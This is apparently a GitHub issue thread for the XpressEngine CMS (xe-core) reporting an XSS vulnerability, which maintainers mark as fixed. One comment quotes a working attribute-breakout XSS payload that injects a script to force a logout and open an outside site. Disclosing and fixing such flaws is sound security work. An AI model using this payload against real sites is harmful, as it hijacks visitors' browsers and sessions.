### ISSUE TITLE
보안 이슈

### ISSUE THREAD

**Issue by ppu314** [xpressengine/xe-core#1619]
XSS공격

**Comment by ppu314** [comment]
" onclick="doCallModuleAction('document','procDocumentVoteUp','581135');return false;"><script type="text/javascript">location.href="/index.php?act=dispMemberLogout";window.open("http://agor.io/");</script> <a href="

**Comment by ppu314** [comment]
https://www.xpressengine.com/index.php?mid=forum&document_srl=23043070

**Comment by YJSoft** [comment]
보안 이슈 등은 깃허브 등이 아니라 contact (at) xpressengine.com 으로 보내 주세요.

**Comment by qw5414** [comment]
관련PR넣었음..

**Comment by bnu** [comment]
fixed #1621
